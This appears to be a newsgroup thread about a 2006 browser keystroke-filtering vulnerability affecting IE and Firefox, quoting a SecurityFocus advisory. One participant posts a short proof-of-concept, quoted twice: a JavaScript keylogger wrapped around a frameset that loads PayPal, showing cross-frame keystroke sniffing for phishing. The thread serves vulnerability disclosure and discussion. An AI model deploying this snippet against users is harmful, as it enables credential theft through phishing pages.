Multiple Vendor Web Browser JavaScript Key Filtering Vulnerability

Affects: IE, Firefox, etc

Multiple Vendor Web Browser JavaScript Key Filtering Vulnerability

"Multiple web browser products are susceptible to a JavaScript key-filtering
vulnerability. This issue is due to the failure of the browsers to securely
handle keystroke input from users.

This issue is demonstrated to allow attackers to divert keystrokes from one
input form in a webpage to a hidden file upload dialog in the same page.
This may allow remote attackers to initiate file uploads from unsuspecting
users. Other attacks may also be possible.

Exploiting this issue requires that users manually type the full path of
files that attackers wish to download. This may require substantial typing
from targeted users, so keyboard-based games, blogs, or other similar pages
are likely to be utilized by attackers to entice users to enter the
required keyboard input to exploit this issue.

Mozilla Suite, Mozilla Firefox, Mozilla SeaMonkey, Netscape Navigator, and
Microsoft Internet Explorer are all reportedly vulnerable to this issue."


http://www.securityfocus.com/bid/18308/discuss


-- Imhotep

imhotep

imhotep wrote:

> This issue is demonstrated to allow attackers to divert keystrokes from one
> input form in a webpage to a hidden file upload dialog in the same page.
> This may allow remote attackers to initiate file uploads from unsuspecting
> users. Other attacks may also be possible.

Where exactly is the vulnerability? It's the same as entering the data
into an invisible form. It's purely PEBKAC.

> Exploiting this issue requires that users manually type the full path of
> files that attackers wish to download. This may require substantial typing
> from targeted users, so keyboard-based games, blogs, or other similar pages
> are likely to be utilized by attackers to entice users to enter the
> required keyboard input to exploit this issue.

What about keystroke sniffing across frames and domains? For IE this is
actually told to be a feature, like any other phishing support. Now this
is a serious problem because one can spoof the address bar on IE as well
and you'll get the SSL lock for free.

<script>
var keylog='Capturing: ';
document.onkeypress = function () {
k = window.event.keyCode;
window.status = keylog += String.fromCharCode(k) + '[' + k +']';}
</script>
<frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
<frame src="https://www.paypal.com" scrolling="auto">
</frameset>

BTW, [X] Tell news!

Sebastian Gottschalk

Sebastian Gottschalk wrote:

> imhotep wrote:
>
>> This issue is demonstrated to allow attackers to divert keystrokes from
>> one input form in a webpage to a hidden file upload dialog in the same
>> page. This may allow remote attackers to initiate file uploads from
>> unsuspecting users. Other attacks may also be possible.
>
> Where exactly is the vulnerability? It's the same as entering the data
> into an invisible form. It's purely PEBKAC.

PEBKAC????

>> Exploiting this issue requires that users manually type the full path of
>> files that attackers wish to download. This may require substantial
>> typing from targeted users, so keyboard-based games, blogs, or other
>> similar pages are likely to be utilized by attackers to entice users to
>> enter the required keyboard input to exploit this issue.
>
> What about keystroke sniffing across frames and domains? For IE this is
> actually told to be a feature, like any other phishing support. Now this
> is a serious problem because one can spoof the address bar on IE as well
> and you'll get the SSL lock for free.

hummmm "feature" eh? Go figures...

> <script>
> var keylog='Capturing: ';
> document.onkeypress = function () {
> k = window.event.keyCode;
> window.status = keylog += String.fromCharCode(k) + '[' + k +']';}
> </script>
> <frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
> <frame src="https://www.paypal.com" scrolling="auto">
> </frameset>
>
> BTW, [X] Tell news!


Imhotep

imhotep

imhotep wrote:

>> Where exactly is the vulnerability? It's the same as entering the data
>> into an invisible form. It's purely PEBKAC.
>
> PEBKAC????

Problem exists between keyboard and chair.

>> What about keystroke sniffing across frames and domains? For IE this is
>> actually told to be a feature, like any other phishing support. Now this
>> is a serious problem because one can spoof the address bar on IE as well
>> and you'll get the SSL lock for free.
>
> hummmm "feature" eh? Go figures...

Don't tell me, tell Microsoft. Keystroke sniffing has been reported a
year ago or so. Same goes for all other phishing stuff IE is open for,
like putting a DIV layer over a frame loaded with a website from another
domain.

Sebastian Gottschalk